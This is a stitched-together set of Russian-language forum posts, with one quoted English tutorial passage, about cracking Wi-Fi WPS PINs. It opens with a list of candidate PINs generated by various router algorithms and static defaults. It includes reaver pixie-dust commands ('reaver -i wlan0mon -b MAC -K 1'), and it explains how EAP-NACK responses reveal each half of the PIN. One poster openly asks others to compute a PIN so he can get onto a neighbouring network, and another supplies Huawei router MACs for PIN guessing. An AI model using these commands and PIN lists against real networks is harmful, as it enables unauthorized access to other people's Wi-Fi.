01190724 | 24-bit PIN 07823688 | 28-bit PIN 73142089 | 32-bit PIN 22160966 | 36-bit PIN 01230406 | 40-bit PIN 96563526 | 44-bit PIN 42781769 | 48-bit PIN 31701563 | Reverse 48-bit PIN 40773490 | D-Link PIN 10647561 | D-Link PIN +1 11785590 | Vodafone EasyBox 41231470 | ASUS PIN 33701837 | Airocon Realtek 66581437 | Inv NIC to PIN 02381442 | NIC * 2 03572160 | NIC * 3 56029666 | OUI + NIC 53648228 | OUI - NIC 55696227 | OUI ^ NIC 12345670 | Static PIN - Cisco 20172527 | Static PIN - Broadcom 1 46264848 | Static PIN - Broadcom 2 76229909 | Static PIN - Broadcom 3 62327145 | Static PIN - Broadcom 4 68175542 | Static PIN - DSL-2740R 95661469 | Static PIN - Realtek 20854836 | Static PIN - Upvel 43977680 | Static PIN - UR-814AC 05294176 | Static PIN - UR-825AC 99956042 | Static PIN - Onlime 35611530 | Static PIN - Edimax 67958146 | Static PIN - Thomson 34259283 | Static PIN - HG532x
Под Windows ещё есть wAirCut с поддержкой pixiewps. Под Android только с root'ом можно проделать такое (и вероятно с внешним адаптером).
Лежу я в темнице сырой...больнице))и манит меня сеть wi fi от кинетиков,писал в одной из соседних тем,но там остряки написали пароль куйзнает на латинском ,тк не выложил хэндшейк...в общем у кого есть минутка,прогоните по скрипту на первой странице 28:28:5d:ed:dd:ce Заранее спасибо
Подскажите для роутеров HUAWEI Маки: 1. EC:23:3D:B2:37:EC 2. 00:66:4B0:F8:58 Возможно ли подобрать пин? Если нет, то есть ли другие способы кроме брута?
и еще если роутер уязвим к pixiewps отправив команду reaver -i wlan0mon -b MAC -K 1 я на автомате получу psk password ?
Triton_Mgn The correct PIN is sent to the Access Point and the clean text password Test123 is given. This method is the “manual” in my opinion at least gives you a hint about what values and tactics is used in the attack. But there is an easier way of doing the attach as well. The modified version of Reaver can do the attack itself, and pass the needed values into pixiewps itself. 10. Type reaver -i <monitor interface> -c <channel> -b <bssid> -vvv -K 1 –f
Если после отсылки сообщения M4 атакующий получил в ответ EAP-NACK, то он может быть уверен, что первая часть PIN-кода неправильная. Если же он получил EAP-NACK после отсылки M6, то, соответственно, вторая часть PIN-кода неверна.